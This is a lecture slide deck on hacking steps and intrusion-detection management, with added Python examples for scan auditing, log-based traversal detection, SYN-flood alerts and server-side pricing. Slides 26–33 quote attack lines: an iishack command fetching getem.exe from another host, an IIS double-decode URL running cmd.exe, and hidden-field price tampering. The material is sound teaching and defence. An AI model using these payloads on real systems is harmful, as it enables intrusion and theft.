HACKING and INTRUSION DETECTION MANAGEMENT - PowerPoint PPT Presentation

1
HACKING and INTRUSION DETECTION MANAGEMENT
  • S.Govinda
  • University of Mauritius
  • mgovinda_at_uom.ac.mu

2
Agenda
  • How is Hacking Done?
  • Examples of Hacking
  • Prevention of Hacking

3
The Enemy is Ignorance
  • Observe your enemies, for they first find out
    your faults
  • Antisthenes, Athenian Philosopher, 440 BC

4
Hacker methodologies.
  • Oxymoron? Not really. There is normally some
    method to this madness.
  • Based on systematically exploiting weaknesses in
    your security infrastructures, both physical and
    IT.

5
Steps to Hacking
  • Foot printing
  • Scanning
  • Enumeration
  • Gaining Access
  • Escalating Privilege
  • Pilfering
  • Covering Tracks
  • Creating Back Doors
  • Denial of Service

6
Footprinting
  • Objective
  • Target Address Ranges, namespace acquisition, and
    information gathering. Very Detailed approach
  • Techniques
  • Open Source Searches, whois, web interface, DNS
    transfer zones

7
Footprinting cont.
  • Tools
    • Whois
      • http://www.networksolutions.com/whois
      • www.arin.net/whois
    • DNS Transfer Zones
      • dig
      • nslookup (ls -d)
      • Sam Spade

8
Scanning
  • Objective
  • Bulk target assessment and identification of
    listening services focuses the attacker's
    attention on the most promising avenue.
  • Techniques
  • Ping Sweeps
  • TCP/UDP Port Scans
  • OS Detection

9
Scanning Cont.
  • Tools
    • Ping Sweeps: fping, WS_Ping Pro Pack
    • TCP/UDP port scan: nmap, SuperScan, fscan
    • OS detection: nmap, queso, siphon

10
Enumeration
  • Objective
  • More intrusive probing now begins as attackers
    begin identifying valid user accounts or poorly
    protected resource shares
  • Techniques
  • List User Shares
  • List File Shares
  • Identify Application

11
Enumeration cont.
  • Tools
    • List User Shares
      • Null sessions
      • DumpAcl
      • Sid2user
      • onsite admin
    • List File Shares
      • showmount
      • Legion
    • Identify Application
      • telnet banner grabbing

12
Gaining Access
  • Objective
  • Enough data has been gathered at this point to
    make an informed attempt to access the target
  • Techniques
  • Password Eavesdropping
  • Password File Grab
  • Buffer Overflows

13
Gaining Access cont.
  • Tools
    • Password Eavesdropping
      • tcpdump
      • L0phtcrack
      • readsmb
    • Password File Grab
      • pwdump2
    • Buffer Overflows
      • BIND
      • IIS

14
Escalating Privilege
  • Objective
  • If only user level access was obtained in the
    last step, the attackers will now seek to gain
    complete control of the system.
  • Techniques
  • Password Cracking
  • Known Exploits

15
Escalating Privilege cont.
  • Tools
    • Password Cracking
      • John
      • L0phtcrack
    • Known Exploits
      • Ic_messages
      • Getadmin
      • sechole

16
Pilfering
  • Objective
  • The information-gathering process begins again to
    identify mechanisms to gain access to trusted
    systems.
  • Techniques
  • Evaluate Trusts
  • Search for clear text passwords

17
Pilfering cont.
  • Tools
    • Evaluate Trusts
      • .rhosts
      • LSA Secrets
    • Search for clear text passwords
      • User data
      • Configuration files
      • Registry

18
Covering Tracks
  • Objective
  • Once ownership of the target is secured, hiding
    this fact from system administrators becomes
    paramount, lest they quickly end the romp.
  • Techniques
  • Clear Logs
  • Hide Tools

19
Covering Tracks cont.
  • Tools
    • Clear Logs
      • Zap
      • Event Log GUI
    • Hide Tools
      • Rootkits
      • File streaming

20
Creating Back Doors
  • Objective
  • Trap doors will be laid in various parts of the
    system to ensure that privileged access is easily
    regained at the whim of the hacker.
  • Techniques
  • Create rogue user accounts
  • Schedule batch jobs
  • Infect startup files
  • Plant control service

21
Creating Back Doors cont.
  • Tools
    • Create rogue user accounts
      • administrators
    • Schedule batch jobs
      • cron
      • AT
    • Infect startup files
      • Startup folder
      • Registry
    • Plant control service
      • Netcat
      • Remote.exe
      • VNC

22
Denial of Service
  • Objective
  • If an attacker is unsuccessful in gaining access,
    they may use readily available exploit code to
    disable a target as a last resort.
  • Techniques
  • SYN flood
  • DDoS
  • ICMP techniques
  • Internet Worms

23
Denial of Service cont.
  • Tools
    • SYN flood
      • synk4
    • DDoS
      • trinoo
    • ICMP techniques
      • Smurf
      • Ping of death
    • Internet Worms
      • Code Red
      • I Love You
      • Melissa

24
Example 1: IIS web exploit
  • Only requires normal web user access to an IIS
    webserver (i.e. port 80 or 443).
  • Using non-standard ports for your web server only
    makes this marginally more difficult.
  • Using SSL (https protocol) will not prevent the
    exploit from succeeding.

25
Example 1: Target info
  • Target IP address is 192.168.168.125
  • Query whois database at ARIN.net to locate owner
    and domain information.
  • Also try reverse DNS mappings for host/domain
    names.

26
Example 1: Services information
  • Use nmap to scan target for services of interest.
  • nmap -sS -p 21-25,80,135-139,443 192.168.168.125

    Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
    Interesting ports on (192.168.168.125):
    (The 7 ports scanned but not shown below are in state: closed)
    Port       State       Service
    21/tcp     open        ftp
    80/tcp     open        http
    135/tcp    open        loc-srv
    139/tcp    open        netbios-ssn
    443/tcp    open        https
    23/tcp     open        telnet
    Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
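A defender reads the same scan result from the other side: every open port that is not part of the server's job is a service to turn off or filter. The following is an added example, not part of the slides, that parses output in the layout of the nmap 2.53 table above and compares it against an assumed allow-list for a DMZ web server (HTTP and HTTPS only). The sample text is constructed to mirror the slide's result, and the allow-list is an assumption, not a policy the presentation states.

```python
import re

# Constructed sample in the layout of the nmap 2.53 output on the slide (not a real capture)
SAMPLE_NMAP_OUTPUT = """\
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on (192.168.168.125):
(The 7 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
80/tcp     open        http
135/tcp    open        loc-srv
139/tcp    open        netbios-ssn
443/tcp    open        https
23/tcp     open        telnet

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
"""

# Assumed policy: a DMZ web server should answer only on HTTP and HTTPS
ALLOWED_SERVICES = {(80, "tcp"), (443, "tcp")}

# One "port/proto   state   service" row of the classic nmap table
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)$")


def parse_open_ports(text):
    """Return (port, proto, service) for every row nmap reports as 'open'."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            found.append((int(m.group(1)), m.group(2), m.group(4)))
    return found


def unexpected_services(text, allowed=ALLOWED_SERVICES):
    """Open ports outside the allow-list: each one is a service to disable or filter."""
    return [(p, proto, svc) for p, proto, svc in parse_open_ports(text)
            if (p, proto) not in allowed]


if __name__ == "__main__":
    for port, proto, svc in unexpected_services(SAMPLE_NMAP_OUTPUT):
        print(f"{port}/{proto} ({svc}) is listening but is not an expected web-server service")
```

Run against the sample, the check flags ftp, loc-srv, netbios-ssn and telnet, which is exactly the "turn off all unnecessary services" item of the prevention slide expressed as a repeatable audit.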
27
Example 1: OS Information
  • nmap -p80 -O 192.168.168.125
  • Uses the open port 80
  • -O tells nmap to fingerprint the Operating System
  • Returns the OS

28
Example 1: Attacks
  • Possible attacks on 192.168.168.125
    • ftp/telnet: password cracking
      • Examples: John, L0phtcrack
    • http/https: web defacing / perversion
      • iishack 192.168.168.125 80 172.29.11.101/getem.exe
      • Use of double decodes:
        http://192.168.168.125/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
    • Denial of Service attacks
      • Example: SYN flooding
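The double-decode request above works because the server checks the path after one round of percent-decoding and then decodes it again before use, so `%255c` passes the check as the harmless-looking `%5c` and only becomes a backslash afterwards. A detector that reads web-server logs has to canonicalise the same way. The following is an added example, not part of the slides: it decodes each request path up to twice, folds backslashes to slashes, and flags any path that resolves to a `..` segment. The log lines are constructed in a simple W3C-style layout (the second one carries the slide's own URL); the layout and the two-round limit are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed W3C-style request log lines (date time client method uri-stem uri-query status);
# the second line carries the double-encoded request from the slide, the rest are made up
SAMPLE_LOG = """\
2001-06-01 10:02:11 172.29.11.101 GET /default.htm - 200
2001-06-01 10:02:19 172.29.11.101 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2001-06-01 10:02:25 172.29.11.101 GET /scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe /c+dir 200
2001-06-01 10:03:02 10.0.0.7 GET /images/logo.gif - 200
2001-06-01 10:03:40 172.29.11.101 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404
"""

# A '..' path segment after canonicalisation: the traversal the double-decode bug unlocks
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def canonicalize(path, rounds=2):
    """Percent-decode up to `rounds` times, then fold backslashes to '/'.
    One round maps %255c -> %5c (which looks harmless); the second maps %5c -> '\\'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(uri_stem, rounds=2):
    """True when the canonical form of the request path contains a '..' segment."""
    return TRAVERSAL.search(canonicalize(uri_stem, rounds)) is not None


def find_traversal_attempts(log_text, rounds=2):
    """Return (client, uri_stem, status) for every request that resolves to a traversal."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        client, stem, status = parts[2], parts[4], parts[6]
        if is_traversal(stem, rounds):
            hits.append((client, stem, status))
    return hits


if __name__ == "__main__":
    for client, stem, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"{client} -> {stem} (status {status})")
```

With a single decoding round the `%255c` request is missed, exactly as the vulnerable server misses it; with two rounds all three traversal attempts from 172.29.11.101 are reported, and the 200 status on the double-decoded one is the line an incident responder would want to see first.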

29
Preventing the attacks
  • Apply software patches to the Operating System
    • iishack exploited a defect in IIS 4.0
    • Check the vendor site, e.g. ftp://ftp.microsoft.com
  • Turn off all unnecessary services
    • ftp, telnet
  • Use strong passwords
    • Password auditing necessary (LC3 software)
    • Password encryption on networks (Kerberos)
  • Apply access control lists on routers
    • Prevents scanning of the network
  • Use a firewall
    • Hides the true IP address of the server
    • Can protect from both internal and external
      attacks
  • Use an Intrusion Detection System
    • Effective against Denial of Service Attacks
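The last item deserves a concrete shape: an IDS recognises a SYN flood not from any single packet but from the number of handshakes that start and never finish against one host. The following is an added example, not from the slides, that counts half-open connections per destination over a list of packet summaries and raises an alert when a threshold is reached. The packet records, the spoofed source range and the threshold of 20 are all constructed assumptions.

```python
from collections import defaultdict

# Constructed packet summaries: (timestamp, src, dst, flags) with "S" = the client's SYN and
# "A" = the client's final ACK of the three-way handshake. Not a real capture.
PACKETS = [
    (0.10, "10.0.0.5", "192.168.168.125", "S"),
    (0.11, "10.0.0.5", "192.168.168.125", "A"),     # legitimate, completed handshake
    (0.20, "10.0.0.9", "192.168.1.12", "S"),
    (0.21, "10.0.0.9", "192.168.1.12", "A"),        # legitimate, different host
]
# Flood: 50 SYNs from 50 (assumed spoofed) sources that never complete the handshake
PACKETS += [(1.0 + i * 0.001, f"203.0.113.{i + 1}", "192.168.168.125", "S") for i in range(50)]


def half_open_by_target(packets):
    """Count, per destination, the SYNs that were never followed by the client's ACK."""
    pending = {}
    for ts, src, dst, flags in sorted(packets):
        key = (src, dst)
        if flags == "S":
            pending.setdefault(key, ts)
        elif flags == "A":
            pending.pop(key, None)   # handshake completed: no longer half-open
    counts = defaultdict(int)
    for _, dst in pending:
        counts[dst] += 1
    return dict(counts)


def syn_flood_alerts(packets, threshold=20):
    """Destinations whose half-open count reaches the threshold (assumed value)."""
    return {dst: n for dst, n in half_open_by_target(packets).items() if n >= threshold}


if __name__ == "__main__":
    for dst, n in syn_flood_alerts(PACKETS).items():
        print(f"possible SYN flood against {dst}: {n} half-open connections")
```

The two legitimate clients leave nothing pending, so only the web server with its 50 unanswered SYNs trips the alert; in a real sensor the same count would be taken over a sliding time window and the threshold tuned to the host's normal backlog.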

30
[Slide 30: network defence diagram; only its labels survive extraction]
  • ACLs on the router:
      access-list 101 deny icmp any any 13
      access-list 101 deny icmp any any 17
  • Monitoring DoS attacks (IDS)
  • NAT 192.168.168.125 <-> 172.22.0.2 (application-specific proxy server)
  • NAT 192.168.168.125 <-> 202.60.7.7 (router)
  • Segments: INTERNET -> ROUTER -> FIREWALL -> DMZ / Public Server Segment
    (192.168.168.125 Web Server); End User Segment
  • SECURE CORPORATE INTRANET: 192.168.1.12 Corporate IS Server,
    not advertised by the firewall over the Internet
31
Example 2: Hacking Windows 95/98, Me/XP
  • Exploiting File Share

32
Example 2: File Share Countermeasure
33
Example 3: Poor Web Design
  • Use of hidden tags in the e-commerce site:
    <FORM ACTION="http://192.168.168.125/cgi-bin/order.pl" method="post">
    <input type="hidden" name="price" value="199.99">
    <input type="hidden" name="prd_id" value="X190">
    QUANTITY <input type="text" name="quant" size="3" maxlength="3" value="1">
    </FORM>
  • A hacker can easily change the value in Netscape Composer:
    <input type="hidden" name="price" value="1.99">
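The fix for this slide is not a better hidden field but a server that never reads the price from the client at all. The following is an added example, not the presentation's own code and not the real `order.pl`: a handler that trusts the posted `price` field, beside one that looks the price up by `prd_id` in a server-side catalogue and validates the quantity itself, plus a check that turns a price mismatch into a logged tampering indicator. The catalogue and the two sample form submissions are constructed.

```python
from decimal import Decimal

# Constructed catalogue standing in for the shop's product table (assumed; not from the slide)
CATALOGUE = {"X190": Decimal("199.99")}

# The form as the slide's HTML would post it, and the same form after the hidden
# price field has been edited down to 1.99
HONEST_ORDER = {"prd_id": "X190", "price": "199.99", "quant": "1"}
TAMPERED_ORDER = {"prd_id": "X190", "price": "1.99", "quant": "1"}


def vulnerable_total(form):
    """Trusts the client-supplied hidden price field (what the slide's order.pl is assumed to do)."""
    return Decimal(form["price"]) * int(form["quant"])


def hardened_total(form):
    """Prices come from the server-side catalogue; the client's price field is never read."""
    prd_id = form["prd_id"]
    if prd_id not in CATALOGUE:
        raise ValueError("unknown product id")
    quant = int(form["quant"])
    if not 1 <= quant <= 999:          # maxlength="3" in the HTML is not a server-side limit
        raise ValueError("quantity out of range")
    return CATALOGUE[prd_id] * quant


def price_mismatch(form):
    """True when the submitted price differs from the catalogue: a tampering indicator to log."""
    return Decimal(form["price"]) != CATALOGUE.get(form["prd_id"])


if __name__ == "__main__":
    print("vulnerable handler charges:", vulnerable_total(TAMPERED_ORDER))
    print("hardened handler charges:  ", hardened_total(TAMPERED_ORDER))
    print("tampering detected:        ", price_mismatch(TAMPERED_ORDER))
```

Using `Decimal` rather than a float keeps money arithmetic exact; the `price_mismatch` check is worth keeping even after the fix, because a client that submits a price the server never asked it to compute is a client worth noticing in the logs.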

34
Example 4: Spoofed E-mails
  • Countermeasure: Disable ActiveX settings

35
Example 4: Hoax Security Alerts
36
Some useful sites
  • SANS Institute (www.sans.org)
  • Security Focus Archives (www.securityfocus.com)
  • Snort IDS home (www.snort.org)
  • Security archives (archives.neohapsis.com)
  • CERT Coordination Center (www.cert.org)